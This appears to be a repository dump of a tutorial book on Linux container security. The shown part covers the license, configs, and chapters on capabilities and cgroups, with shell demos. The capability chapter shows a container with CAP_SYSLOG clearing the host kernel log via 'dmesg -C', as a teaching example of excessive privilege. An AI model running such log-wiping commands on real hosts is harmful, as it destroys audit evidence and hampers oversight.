Repository: mrtc0/container-security-book
Branch: master
Commit: 39d9e25ec937
Files: 48
Total size: 139.3 KB

Directory structure:
gitextract_vq0wp2g_/

├── .gitignore
├── LICENSE
├── README.md
├── book.json
├── package.json
├── renovate.json
└── source/
    ├── README.md
    ├── REFERENCES.md
    ├── SUMMARY.md
    ├── capability/
    │   └── README.md
    ├── cgroup/
    │   └── README.md
    ├── container-basics.md
    ├── hardening/
    │   ├── README.md
    │   ├── apparmor.md
    │   ├── cis-benchmark.md
    │   ├── monitoring.md
    │   ├── no-new-privileges.md
    │   ├── runtime.md
    │   └── seccomp.md
    ├── introduction.md
    ├── kubernetes/
    │   ├── hardening/
    │   │   ├── README.md
    │   │   └── secret-management.md
    │   └── security/
    │       ├── README.md
    │       ├── ctf.md
    │       ├── etcd.md
    │       ├── hostpath-mount.md
    │       ├── metadata-service.md
    │       ├── privileged-pod.md
    │       └── service-account.md
    ├── lsm/
    │   └── apparmor.md
    ├── namespace/
    │   ├── README.md
    │   ├── chroot-and-pivot_root.md
    │   ├── mount.md
    │   ├── pid.md
    │   ├── user.md
    │   └── uts.md
    ├── seccomp/
    │   └── README.md
    ├── security/
    │   ├── DoS.md
    │   ├── README.md
    │   ├── adding-a-user-to-group.md
    │   ├── apparmor-bypass.md
    │   ├── breakout-to-host.md
    │   ├── image/
    │   │   ├── README.md
    │   │   ├── scanner.md
    │   │   └── secrets-in-layer.md
    │   ├── seccomp-bypass.md
    │   └── sensitive-file-mount.md
    └── styles/
        └── website.css

================================================
FILE CONTENTS
================================================

================================================
FILE: .gitignore
================================================
node_modules/
_book/


================================================
FILE: LICENSE
================================================
Attribution-NonCommercial 4.0 International

=======================================================================

Creative Commons Corporation ("Creative Commons") is not a law firm and
does not provide legal services or legal advice. Distribution of
Creative Commons public licenses does not create a lawyer-client or
other relationship. Creative Commons makes its licenses and related
information available on an "as-is" basis. Creative Commons gives no
warranties regarding its licenses, any material licensed under their
terms and conditions, or any related information. Creative Commons
disclaims all liability for damages resulting from their use to the
fullest extent possible.

Using Creative Commons Public Licenses

Creative Commons public licenses provide a standard set of terms and
conditions that creators and other rights holders may use to share
original works of authorship and other material subject to copyright
and certain other rights specified in the public license below. The
following considerations are for informational purposes only, are not
exhaustive, and do not form part of our licenses.

     Considerations for licensors: Our public licenses are
     intended for use by those authorized to give the public
     permission to use material in ways otherwise restricted by
     copyright and certain other rights. Our licenses are
     irrevocable. Licensors should read and understand the terms
     and conditions of the license they choose before applying it.
     Licensors should also secure all rights necessary before
     applying our licenses so that the public can reuse the
     material as expected. Licensors should clearly mark any
     material not subject to the license. This includes other CC-
     licensed material, or material used under an exception or
     limitation to copyright. More considerations for licensors:
    wiki.creativecommons.org/Considerations_for_licensors

     Considerations for the public: By using one of our public
     licenses, a licensor grants the public permission to use the
     licensed material under specified terms and conditions. If
     the licensor's permission is not necessary for any reason--for
     example, because of any applicable exception or limitation to
     copyright--then that use is not regulated by the license. Our
     licenses grant only permissions under copyright and certain
     other rights that a licensor has authority to grant. Use of
     the licensed material may still be restricted for other
     reasons, including because others have copyright or other
     rights in the material. A licensor may make special requests,
     such as asking that all changes be marked or described.
     Although not required by our licenses, you are encouraged to
     respect those requests where reasonable. More considerations
     for the public:
    wiki.creativecommons.org/Considerations_for_licensees

=======================================================================

Creative Commons Attribution-NonCommercial 4.0 International Public
License

By exercising the Licensed Rights (defined below), You accept and agree
to be bound by the terms and conditions of this Creative Commons
Attribution-NonCommercial 4.0 International Public License ("Public
License"). To the extent this Public License may be interpreted as a
contract, You are granted the Licensed Rights in consideration of Your
acceptance of these terms and conditions, and the Licensor grants You
such rights in consideration of benefits the Licensor receives from
making the Licensed Material available under these terms and
conditions.


Section 1 -- Definitions.

  a. Adapted Material means material subject to Copyright and Similar
     Rights that is derived from or based upon the Licensed Material
     and in which the Licensed Material is translated, altered,
     arranged, transformed, or otherwise modified in a manner requiring
     permission under the Copyright and Similar Rights held by the
     Licensor. For purposes of this Public License, where the Licensed
     Material is a musical work, performance, or sound recording,
     Adapted Material is always produced where the Licensed Material is
     synched in timed relation with a moving image.

  b. Adapter's License means the license You apply to Your Copyright
     and Similar Rights in Your contributions to Adapted Material in
     accordance with the terms and conditions of this Public License.

  c. Copyright and Similar Rights means copyright and/or similar rights
     closely related to copyright including, without limitation,
     performance, broadcast, sound recording, and Sui Generis Database
     Rights, without regard to how the rights are labeled or
     categorized. For purposes of this Public License, the rights
     specified in Section 2(b)(1)-(2) are not Copyright and Similar
     Rights.

  d. Effective Technological Measures means those measures that, in the
     absence of proper authority, may not be circumvented under laws
     fulfilling obligations under Article 11 of the WIPO Copyright
     Treaty adopted on December 20, 1996, and/or similar international
     agreements.

  e. Exceptions and Limitations means fair use, fair dealing, and/or
     any other exception or limitation to Copyright and Similar Rights
     that applies to Your use of the Licensed Material.

  f. Licensed Material means the artistic or literary work, database,
     or other material to which the Licensor applied this Public
     License.

  g. Licensed Rights means the rights granted to You subject to the
     terms and conditions of this Public License, which are limited to
     all Copyright and Similar Rights that apply to Your use of the
     Licensed Material and that the Licensor has authority to license.

  h. Licensor means the individual(s) or entity(ies) granting rights
     under this Public License.

  i. NonCommercial means not primarily intended for or directed towards
     commercial advantage or monetary compensation. For purposes of
     this Public License, the exchange of the Licensed Material for
     other material subject to Copyright and Similar Rights by digital
     file-sharing or similar means is NonCommercial provided there is
     no payment of monetary compensation in connection with the
     exchange.

  j. Share means to provide material to the public by any means or
     process that requires permission under the Licensed Rights, such
     as reproduction, public display, public performance, distribution,
     dissemination, communication, or importation, and to make material
     available to the public including in ways that members of the
     public may access the material from a place and at a time
     individually chosen by them.

  k. Sui Generis Database Rights means rights other than copyright
     resulting from Directive 96/9/EC of the European Parliament and of
     the Council of 11 March 1996 on the legal protection of databases,
     as amended and/or succeeded, as well as other essentially
     equivalent rights anywhere in the world.

  l. You means the individual or entity exercising the Licensed Rights
     under this Public License. Your has a corresponding meaning.


Section 2 -- Scope.

  a. License grant.

       1. Subject to the terms and conditions of this Public License,
          the Licensor hereby grants You a worldwide, royalty-free,
          non-sublicensable, non-exclusive, irrevocable license to
          exercise the Licensed Rights in the Licensed Material to:

            a. reproduce and Share the Licensed Material, in whole or
               in part, for NonCommercial purposes only; and

            b. produce, reproduce, and Share Adapted Material for
               NonCommercial purposes only.

       2. Exceptions and Limitations. For the avoidance of doubt, where
          Exceptions and Limitations apply to Your use, this Public
          License does not apply, and You do not need to comply with
          its terms and conditions.

       3. Term. The term of this Public License is specified in Section
          6(a).

       4. Media and formats; technical modifications allowed. The
          Licensor authorizes You to exercise the Licensed Rights in
          all media and formats whether now known or hereafter created,
          and to make technical modifications necessary to do so. The
          Licensor waives and/or agrees not to assert any right or
          authority to forbid You from making technical modifications
          necessary to exercise the Licensed Rights, including
          technical modifications necessary to circumvent Effective
          Technological Measures. For purposes of this Public License,
          simply making modifications authorized by this Section 2(a)
          (4) never produces Adapted Material.

       5. Downstream recipients.

            a. Offer from the Licensor -- Licensed Material. Every
               recipient of the Licensed Material automatically
               receives an offer from the Licensor to exercise the
               Licensed Rights under the terms and conditions of this
               Public License.

            b. No downstream restrictions. You may not offer or impose
               any additional or different terms or conditions on, or
               apply any Effective Technological Measures to, the
               Licensed Material if doing so restricts exercise of the
               Licensed Rights by any recipient of the Licensed
               Material.

       6. No endorsement. Nothing in this Public License constitutes or
          may be construed as permission to assert or imply that You
          are, or that Your use of the Licensed Material is, connected
          with, or sponsored, endorsed, or granted official status by,
          the Licensor or others designated to receive attribution as
          provided in Section 3(a)(1)(A)(i).

  b. Other rights.

       1. Moral rights, such as the right of integrity, are not
          licensed under this Public License, nor are publicity,
          privacy, and/or other similar personality rights; however, to
          the extent possible, the Licensor waives and/or agrees not to
          assert any such rights held by the Licensor to the limited
          extent necessary to allow You to exercise the Licensed
          Rights, but not otherwise.

       2. Patent and trademark rights are not licensed under this
          Public License.

       3. To the extent possible, the Licensor waives any right to
          collect royalties from You for the exercise of the Licensed
          Rights, whether directly or through a collecting society
          under any voluntary or waivable statutory or compulsory
          licensing scheme. In all other cases the Licensor expressly
          reserves any right to collect such royalties, including when
          the Licensed Material is used other than for NonCommercial
          purposes.


Section 3 -- License Conditions.

Your exercise of the Licensed Rights is expressly made subject to the
following conditions.

  a. Attribution.

       1. If You Share the Licensed Material (including in modified
          form), You must:

            a. retain the following if it is supplied by the Licensor
               with the Licensed Material:

                 i. identification of the creator(s) of the Licensed
                    Material and any others designated to receive
                    attribution, in any reasonable manner requested by
                    the Licensor (including by pseudonym if
                    designated);

                ii. a copyright notice;

               iii. a notice that refers to this Public License;

                iv. a notice that refers to the disclaimer of
                    warranties;

                 v. a URI or hyperlink to the Licensed Material to the
                    extent reasonably practicable;

            b. indicate if You modified the Licensed Material and
               retain an indication of any previous modifications; and

            c. indicate the Licensed Material is licensed under this
               Public License, and include the text of, or the URI or
               hyperlink to, this Public License.

       2. You may satisfy the conditions in Section 3(a)(1) in any
          reasonable manner based on the medium, means, and context in
          which You Share the Licensed Material. For example, it may be
          reasonable to satisfy the conditions by providing a URI or
          hyperlink to a resource that includes the required
          information.

       3. If requested by the Licensor, You must remove any of the
          information required by Section 3(a)(1)(A) to the extent
          reasonably practicable.

       4. If You Share Adapted Material You produce, the Adapter's
          License You apply must not prevent recipients of the Adapted
          Material from complying with this Public License.


Section 4 -- Sui Generis Database Rights.

Where the Licensed Rights include Sui Generis Database Rights that
apply to Your use of the Licensed Material:

  a. for the avoidance of doubt, Section 2(a)(1) grants You the right
     to extract, reuse, reproduce, and Share all or a substantial
     portion of the contents of the database for NonCommercial purposes
     only;

  b. if You include all or a substantial portion of the database
     contents in a database in which You have Sui Generis Database
     Rights, then the database in which You have Sui Generis Database
     Rights (but not its individual contents) is Adapted Material; and

  c. You must comply with the conditions in Section 3(a) if You Share
     all or a substantial portion of the contents of the database.

For the avoidance of doubt, this Section 4 supplements and does not
replace Your obligations under this Public License where the Licensed
Rights include other Copyright and Similar Rights.


Section 5 -- Disclaimer of Warranties and Limitation of Liability.

  a. UNLESS OTHERWISE SEPARATELY UNDERTAKEN BY THE LICENSOR, TO THE
     EXTENT POSSIBLE, THE LICENSOR OFFERS THE LICENSED MATERIAL AS-IS
     AND AS-AVAILABLE, AND MAKES NO REPRESENTATIONS OR WARRANTIES OF
     ANY KIND CONCERNING THE LICENSED MATERIAL, WHETHER EXPRESS,
     IMPLIED, STATUTORY, OR OTHER. THIS INCLUDES, WITHOUT LIMITATION,
     WARRANTIES OF TITLE, MERCHANTABILITY, FITNESS FOR A PARTICULAR
     PURPOSE, NON-INFRINGEMENT, ABSENCE OF LATENT OR OTHER DEFECTS,
     ACCURACY, OR THE PRESENCE OR ABSENCE OF ERRORS, WHETHER OR NOT
     KNOWN OR DISCOVERABLE. WHERE DISCLAIMERS OF WARRANTIES ARE NOT
     ALLOWED IN FULL OR IN PART, THIS DISCLAIMER MAY NOT APPLY TO YOU.

  b. TO THE EXTENT POSSIBLE, IN NO EVENT WILL THE LICENSOR BE LIABLE
     TO YOU ON ANY LEGAL THEORY (INCLUDING, WITHOUT LIMITATION,
     NEGLIGENCE) OR OTHERWISE FOR ANY DIRECT, SPECIAL, INDIRECT,
     INCIDENTAL, CONSEQUENTIAL, PUNITIVE, EXEMPLARY, OR OTHER LOSSES,
     COSTS, EXPENSES, OR DAMAGES ARISING OUT OF THIS PUBLIC LICENSE OR
     USE OF THE LICENSED MATERIAL, EVEN IF THE LICENSOR HAS BEEN
     ADVISED OF THE POSSIBILITY OF SUCH LOSSES, COSTS, EXPENSES, OR
     DAMAGES. WHERE A LIMITATION OF LIABILITY IS NOT ALLOWED IN FULL OR
     IN PART, THIS LIMITATION MAY NOT APPLY TO YOU.

  c. The disclaimer of warranties and limitation of liability provided
     above shall be interpreted in a manner that, to the extent
     possible, most closely approximates an absolute disclaimer and
     waiver of all liability.


Section 6 -- Term and Termination.

  a. This Public License applies for the term of the Copyright and
     Similar Rights licensed here. However, if You fail to comply with
     this Public License, then Your rights under this Public License
     terminate automatically.

  b. Where Your right to use the Licensed Material has terminated under
     Section 6(a), it reinstates:

       1. automatically as of the date the violation is cured, provided
          it is cured within 30 days of Your discovery of the
          violation; or

       2. upon express reinstatement by the Licensor.

     For the avoidance of doubt, this Section 6(b) does not affect any
     right the Licensor may have to seek remedies for Your violations
     of this Public License.

  c. For the avoidance of doubt, the Licensor may also offer the
     Licensed Material under separate terms or conditions or stop
     distributing the Licensed Material at any time; however, doing so
     will not terminate this Public License.

  d. Sections 1, 5, 6, 7, and 8 survive termination of this Public
     License.


Section 7 -- Other Terms and Conditions.

  a. The Licensor shall not be bound by any additional or different
     terms or conditions communicated by You unless expressly agreed.

  b. Any arrangements, understandings, or agreements regarding the
     Licensed Material not stated herein are separate from and
     independent of the terms and conditions of this Public License.


Section 8 -- Interpretation.

  a. For the avoidance of doubt, this Public License does not, and
     shall not be interpreted to, reduce, limit, restrict, or impose
     conditions on any use of the Licensed Material that could lawfully
     be made without permission under this Public License.

  b. To the extent possible, if any provision of this Public License is
     deemed unenforceable, it shall be automatically reformed to the
     minimum extent necessary to make it enforceable. If the provision
     cannot be reformed, it shall be severed from this Public License
     without affecting the enforceability of the remaining terms and
     conditions.

  c. No term or condition of this Public License will be waived and no
     failure to comply consented to unless expressly agreed to by the
     Licensor.

  d. Nothing in this Public License constitutes or may be interpreted
     as a limitation upon, or waiver of, any privileges and immunities
     that apply to the Licensor or You, including from the legal
     processes of any jurisdiction or authority.

=======================================================================

Creative Commons is not a party to its public
licenses. Notwithstanding, Creative Commons may elect to apply one of
its public licenses to material it publishes and in those instances
will be considered the “Licensor.” The text of the Creative Commons
public licenses is dedicated to the public domain under the CC0 Public
Domain Dedication. Except for the limited purpose of indicating that
material is shared under a Creative Commons public license or as
otherwise permitted by the Creative Commons policies published at
creativecommons.org/policies, Creative Commons does not authorize the
use of the trademark "Creative Commons" or any other trademark or logo
of Creative Commons without its prior written consent including,
without limitation, in connection with any unauthorized modifications
to any of its public licenses or any other arrangements,
understandings, or agreements concerning use of licensed material. For
the avoidance of doubt, this paragraph does not form part of the
public licenses.

Creative Commons may be contacted at creativecommons.org.


================================================
FILE: README.md
================================================
# container-security-book

---

# About

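This document is for people who want to start learning about Linux container security.
It is written as a stepping stone for people who work with containers regularly but are not familiar with the underlying technologies or their security.

If you find typos or mistakes, please open an Issue or Pull Request at https://github.com/mrtc0/container-security-book.
For comments and feedback, please tweet with the Twitter hashtag #container_security.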

# Status

This document is still a work in progress.

# License

All source code in this book is provided as open source software under the MIT License.
The text is provided under the Creative Commons Attribution-NonCommercial 4.0 (CC BY-NC 4.0) license.


================================================
FILE: book.json
================================================
{
  "root": "./source",
  "title": "Container Security Book",
  "description": "A document for people who want to start learning about Linux container security",
  "author": "Kohei Morita @mrtc0",
  "plugins": [
    "image-captions",
    "anchors"
  ]
}


================================================
FILE: package.json
================================================
{
  "name": "container-security-book",
  "version": "1.0.0",
  "description": "",
  "main": "index.js",
  "scripts": {
    "build": "honkit build",
    "serve": "honkit serve",
    "test": "echo \"Error: no test specified\" && exit 1"
  },
  "keywords": [],
  "author": "",
  "license": "ISC",
  "devDependencies": {
    "honkit": "3.6.23"
  },
  "dependencies": {
    "gitbook-plugin-anchors": "^0.7.1",
    "gitbook-plugin-image-captions": "^3.1.0"
  }
}


================================================
FILE: renovate.json
================================================
{
  "extends": [
    "config:base"
  ]
}


================================================
FILE: source/README.md
================================================
---
author: mrtc0
fullTitle: "Container Security Book - Learn about Linux container security"
description: "A document for people who want to start learning about the underlying technologies and security of Linux containers."
---

# Container Security Book

> ⚠️ This document is a work in progress.

# About

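This document is for people who want to start learning about Linux container security.  
It is written as a stepping stone for people who work with containers regularly but are not familiar with the underlying technologies or their security.

If you find typos or mistakes, please open an Issue or Pull Request at https://github.com/mrtc0/container-security-book.  
For comments and feedback, please tweet with the Twitter hashtag #container_security.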

# License

All source code in this book is licensed under the MIT License.  
The text is provided under the Creative Commons Attribution-NonCommercial 4.0 (CC BY-NC 4.0) license.


================================================
FILE: source/REFERENCES.md
================================================
# References

* Docker Documentation / https://docs.docker.com/
* LXD / https://linuxcontainers.org/lxd/docs/master/ (Japanese translation: https://lxd-ja.readthedocs.io/ja/latest/)
* Understanding and Hardening Linux Containers - NCC Group Whitepaper / https://research.nccgroup.com/wp-content/uploads/2020/07/ncc_group_understanding_hardening_linux_containers-1-1.pdf
* Abusing Privileged and Unprivileged Linux Containers - An NCC Group Publication / https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2016/june/container_whitepaper.pdf
* コンテナ技術入門 - 仮想化との違いを知り、要素技術を触って学ぼう - エンジニアHub / https://eh-career.com/engineerhub/entry/2019/02/05/103000
* LXCで学ぶコンテナ入門 －軽量仮想化環境を実現する技術 - gihyo.jp / https://gihyo.jp/admin/serial/01/linux_containers
* Docker/Kubernetes開発・運用のためのセキュリティ実践ガイド / https://www.amazon.co.jp/dp/4839970505
* Container Security: Fundamental Technology Concepts That Protect Containerized Applications / https://www.amazon.co.jp/dp/1492056707


================================================
FILE: source/SUMMARY.md
================================================
# Summary

## Getting Started

- [About](README.md)
- [Introduction](introduction.md)

## Container Fundamentals

- [Container Fundamentals](container-basics.md)
- [Namespace](namespace/README.md)
  - [UTS Namespace](namespace/uts.md)
  - [PID Namespace](namespace/pid.md)
  - [Mount Namespace](namespace/mount.md)
  - [User Namespace](namespace/user.md)
- [chroot and pivot_root](namespace/chroot-and-pivot_root.md)
- [Capability](capability/README.md)
- [Seccomp](seccomp/README.md)
- [AppArmor](lsm/apparmor.md)
- [cgroup](cgroup/README.md)

## Container Security and Attack Examples

- [Security](security/README.md)
  - [Breakout Container](security/breakout-to-host.md)
  - [Sensitive file mount](security/sensitive-file-mount.md)
  - [DoS](security/DoS.md)
  - [Adding a user to group](security/adding-a-user-to-group.md)
  - [AppArmor Bypass](security/apparmor-bypass.md)
  - [seccomp Bypass](security/seccomp-bypass.md)
  - [Secrets in Layer](security/image/secrets-in-layer.md)
  - [Image Scanner](security/image/scanner.md)

## Hardening Container

- [Hardening Container](hardening/README.md)
  - [No New Privileges](hardening/no-new-privileges.md)
  - [AppArmor](hardening/apparmor.md)
  - [seccomp](hardening/seccomp.md)
  - [runtime](hardening/runtime.md)
  - [Monitoring](hardening/monitoring.md)
  - [CIS Benchmark](hardening/cis-benchmark.md)

## Kubernetes Security and Attack Examples

- [Kubernetes Security](kubernetes/security/README.md)
  - [Accessing Cloud Provider Metadata Services](kubernetes/security/metadata-service.md)
  - [Escaping to the Node via hostPath](kubernetes/security/hostpath-mount.md)
  - [Pod Privileges and Escaping to the Node](kubernetes/security/privileged-pod.md)
  - [Excessive ServiceAccount Permissions](kubernetes/security/service-account.md)
  - [etcd](kubernetes/security/etcd.md)

## Hardening Kubernetes

- [Hardening Kubernetes](kubernetes/hardening/README.md)
  - [Secret Management](kubernetes/hardening/secret-management.md)

## References

- [References](REFERENCES.md)


================================================
FILE: source/capability/README.md
================================================
# Capability

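Linux has a mechanism called capabilities that lets you assign fine-grained privileges to files and processes.

For example, listening on a port number below 1024 requires privileges. Normally that means starting the process as root, but granting the `CAP_NET_BIND_SERVICE` capability lets an unprivileged process do it.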

```sh
ubuntu@docker:~$ cp $(which python3) mypython3
# Without the capability, the process cannot listen on port 80
ubuntu@docker:~$ getcap mypython3
ubuntu@docker:~$ ./mypython3 -m http.server 80
Traceback (most recent call last):
  File "/usr/lib/python3.8/runpy.py", line 194, in _run_module_as_main
    return _run_code(code, main_globals, None,
  File "/usr/lib/python3.8/runpy.py", line 87, in _run_code
    exec(code, run_globals)
  File "/usr/lib/python3.8/http/server.py", line 1294, in <module>
    test(
  File "/usr/lib/python3.8/http/server.py", line 1249, in test
    with ServerClass(addr, HandlerClass) as httpd:
  File "/usr/lib/python3.8/socketserver.py", line 452, in __init__
    self.server_bind()
  File "/usr/lib/python3.8/http/server.py", line 1292, in server_bind
    return super().server_bind()
  File "/usr/lib/python3.8/http/server.py", line 138, in server_bind
    socketserver.TCPServer.server_bind(self)
  File "/usr/lib/python3.8/socketserver.py", line 466, in server_bind
    self.socket.bind(self.server_address)
PermissionError: [Errno 13] Permission denied

# With the capability granted, the process can listen on port 80
ubuntu@docker:~$ sudo setcap 'cap_net_bind_service=+ep' ./mypython3
ubuntu@docker:~$ ./mypython3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
```
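The kernel tracks each process's capability sets as bitmasks, which appear as hex values such as `CapEff` in `/proc/<pid>/status`. The following is a minimal sketch that decodes such a mask into capability names. The helper names `decode_caps` and `effective_caps` are hypothetical and chosen for illustration; the bit numbers follow `<linux/capability.h>`.

```python
# Capability names indexed by bit number, following <linux/capability.h>.
CAP_NAMES = [
    "cap_chown", "cap_dac_override", "cap_dac_read_search", "cap_fowner",
    "cap_fsetid", "cap_kill", "cap_setgid", "cap_setuid", "cap_setpcap",
    "cap_linux_immutable", "cap_net_bind_service", "cap_net_broadcast",
    "cap_net_admin", "cap_net_raw", "cap_ipc_lock", "cap_ipc_owner",
    "cap_sys_module", "cap_sys_rawio", "cap_sys_chroot", "cap_sys_ptrace",
    "cap_sys_pacct", "cap_sys_admin", "cap_sys_boot", "cap_sys_nice",
    "cap_sys_resource", "cap_sys_time", "cap_sys_tty_config", "cap_mknod",
    "cap_lease", "cap_audit_write", "cap_audit_control", "cap_setfcap",
    "cap_mac_override", "cap_mac_admin", "cap_syslog", "cap_wake_alarm",
    "cap_block_suspend", "cap_audit_read", "cap_perfmon", "cap_bpf",
    "cap_checkpoint_restore",
]


def decode_caps(mask):
    """Return the names of the capabilities whose bits are set in mask."""
    return [name for bit, name in enumerate(CAP_NAMES) if mask & (1 << bit)]


def effective_caps(status_text):
    """Decode the CapEff line from the text of a /proc/<pid>/status file."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return decode_caps(int(line.split()[1], 16))
    raise ValueError("no CapEff line found")


if __name__ == "__main__":
    # Bit 10 alone corresponds to the capability granted with setcap above.
    print(decode_caps(0x400))
```

On a Linux host, passing the contents of `/proc/self/status` to `effective_caps` lists the effective capabilities of the current process.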

For Docker containers, `--cap-add` and `--cap-drop` add or remove capabilities.  
Running `ping` requires `CAP_NET_RAW`, so dropping that capability confirms that `ping` can no longer be executed.[^1]

```sh
$ docker run --rm -it ubuntu:latest bash
root@4e89e243ccee:/# apt-get -qq update ; apt-get -qq -y install iputils-ping
root@4e89e243ccee:/# ps
root@4e89e243ccee:/# getpcaps 1
1: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+eip
root@4e89e243ccee:/# ping -c 1 8.8.8.8
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
64 bytes from 8.8.8.8: icmp_seq=1 ttl=113 time=17.9 ms

$ docker run --cap-drop net_raw --rm -it ubuntu:latest bash
root@31bb88ca04f8:/# apt-get -qq update ; apt-get -qq -y install iputils-ping
root@31bb88ca04f8:/# ps
root@31bb88ca04f8:/# getpcaps 1
1: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+eip
root@31bb88ca04f8:/# ping 8.8.8.8
bash: /usr/bin/ping: Operation not permitted
```
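To see exactly what `--cap-drop net_raw` changed, the two `getpcaps` lines from the transcript can be compared as sets. This is a small sketch that assumes the single-clause output format shown above (`1: = name,name+eip`); other libcap versions print a different layout, and `parse_getpcaps` is a hypothetical helper.

```python
def parse_getpcaps(line):
    """Parse a line like '1: = cap_chown,cap_kill+eip' into a set of names."""
    # Everything after '=' is the capability clause.
    clause = line.split("=", 1)[1].strip()
    # Drop the trailing '+eip' flags, keeping only the comma-separated names.
    names = clause.rsplit("+", 1)[0]
    return {name for name in names.split(",") if name}


# The two getpcaps lines copied from the transcript above.
DEFAULT = (
    "1: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,"
    "cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,"
    "cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+eip"
)
DROPPED = (
    "1: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,"
    "cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,"
    "cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+eip"
)

removed = parse_getpcaps(DEFAULT) - parse_getpcaps(DROPPED)
print(sorted(removed))  # ['cap_net_raw']
```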

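There are many capabilities, and some of them let a container affect the host.  
Granting excessive capabilities can therefore lead to a container breakout.

A simple example is `CAP_SYSLOG`. When it is granted to a container, the container can read and clear the host kernel's log through `dmesg`.  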

```sh
ubuntu@docker:~$ docker run --cap-add syslog --rm -it ubuntu:20.04
root@1577bebb133d:/# dmesg | head
[    0.000000] Linux version 5.4.0-47-generic (buildd@lcy01-amd64-014) (gcc version 9.3.0 (Ubuntu 9.3.0-10ubuntu2)) #51-Ubuntu SMP Fri Sep 4 19:50:52 UTC 2020 (Ubuntu 5.4.0-47.51-generic 5.4.55)
[    0.000000] Command line: earlyprintk=serial console=ttyS0 root=/dev/vda1 rw panic=1 no_timer_check
[    0.000000] KERNEL supported cpus:
[    0.000000]   Intel GenuineIntel
[    0.000000]   AMD AuthenticAMD
[    0.000000]   Hygon HygonGenuine
[    0.000000]   Centaur CentaurHauls
[    0.000000]   zhaoxin   Shanghai
[    0.000000] x86/fpu: Supporting XSAVE feature 0x001: 'x87 floating point registers'
[    0.000000] x86/fpu: Supporting XSAVE feature 0x002: 'SSE registers'
root@1577bebb133d:/# dmesg -C
root@1577bebb133d:/# dmesg
```

Docker, LXC, and similar runtimes do not grant dangerous capabilities like this by default.[^2]  
For the vulnerabilities that arise when dangerous capabilities are granted, see [Escaping to the Host](../security/breakout-to-host.md).

---

* [^1] https://blog.ssrf.in/post/ping-does-not-require-cap-net-raw-capability/ "CAP_NET_RAW is not required when net.ipv4.ping_group_range is set"
* [^2] https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities "Runtime privilege and Linux capabilities / docker docs"


================================================
FILE: source/cgroup/README.md
================================================
# cgroup

cgroup is a mechanism that groups processes and limits the resources available to the processes in each group.  
cgroups are operated through a filesystem called cgroupfs, which is usually mounted at `/sys/fs/cgroup`.

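The controllers for each kind of limitable resource are called subsystems. They can limit things such as the number of CPU cores, memory usage, and the number of processes.  
See the man page for details on subsystems[^1].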

## Limiting CPU usage

Start a process that runs an infinite loop so that it drives CPU usage to 100%.  
While the process is not under cgroup control, `top` shows it using 100% of a CPU.

```sh
$ while true; do : ; done &
[1] 16541

$ top

    PID USER      PR  NI    VIRT    RES    SHR S  %CPU  %MEM     TIME+ COMMAND
  16541 ubuntu    20   0   10252   1960      0 R 100.0   0.0   0:18.27 bash
```

Place this process under cgroup control.

```sh
$ sudo mkdir /sys/fs/cgroup/cpu/test
$ echo 16541 | sudo tee -a /sys/fs/cgroup/cpu/test/tasks
```

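Next, limit CPU usage to 50%. With the default `cpu.cfs_period_us` of 100000, a `cpu.cfs_quota_us` of 50000 allows half of one CPU, and usage settles at around 50%.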

```sh
$ echo 50000 | sudo tee -a /sys/fs/cgroup/cpu/test/cpu.cfs_quota_us
50000
$ top
    PID USER      PR  NI    VIRT    RES    SHR S  %CPU  %MEM     TIME+ COMMAND
  16541 ubuntu    20   0   10252   1960      0 R  49.8   0.0   9:48.24 bash
```
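
The 50% figure follows from the ratio of `cpu.cfs_quota_us` to `cpu.cfs_period_us`. As a minimal sketch of that arithmetic, assuming the cgroup v1 default period of 100000 µs (the period is not shown in the session above, and the helper name is hypothetical):

```python
def cpu_limit_percent(quota_us: int, period_us: int = 100_000) -> float:
    """Return the CPU limit as a percentage of one core.

    quota_us  -- value written to cpu.cfs_quota_us (negative means "no limit")
    period_us -- value of cpu.cfs_period_us (assumed default: 100000)
    """
    if quota_us < 0:
        return float("inf")  # a negative quota disables the limit
    return quota_us / period_us * 100


# Quota used in the example above
print(cpu_limit_percent(50_000))
```

A quota larger than the period, such as 200000, would correspond to two full cores.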

## Limiting memory usage

Next, limit memory usage to 200 MB. First, start a process that allocates 500 MB.

```sh
$ stress --vm 1 --vm-bytes 500M
stress: info: [17223] dispatching hogs: 0 cpu, 0 io, 1 vm, 0 hdd

$ top
   PID USER      PR  NI    VIRT    RES    SHR S  %CPU  %MEM     TIME+ COMMAND
  17273 root      20   0  515860 291760    208 R 100.0   7.2   0:23.89 stress
```

Place the process under cgroup control.

```sh
$ sudo mkdir /sys/fs/cgroup/memory/test
$ echo 17273 | sudo tee -a /sys/fs/cgroup/memory/test/tasks
17273
```

Limit memory usage to 200 MB.

```sh
ubuntu@docker:~$ echo 200M | sudo tee -a /sys/fs/cgroup/memory/test/memory.limit_in_bytes
200M
```
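
The `200M` written to `memory.limit_in_bytes` is interpreted with binary units, so it corresponds to 200 × 1024 × 1024 bytes. The following is a small sketch of that conversion; the helper name and the supported suffix set (K, M, G) are assumptions made for illustration.

```python
UNITS = {"K": 1024, "M": 1024**2, "G": 1024**3}


def parse_size(text: str) -> int:
    """Convert a size such as "200M" into a number of bytes."""
    text = text.strip()
    suffix = text[-1].upper()
    if suffix in UNITS:
        return int(text[:-1]) * UNITS[suffix]
    return int(text)  # no suffix: the value is already in bytes


print(parse_size("200M"))
```

The same conversion explains why `docker run -m 100m` results in `104857600` in `memory.limit_in_bytes` in the Docker example in this chapter.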

Once the limit is applied, `stress` is killed by the OOM killer.

```sh
stress: FAIL: [17272] (415) <-- worker 17273 got signal 9
stress: WARN: [17272] (417) now reaping child worker processes
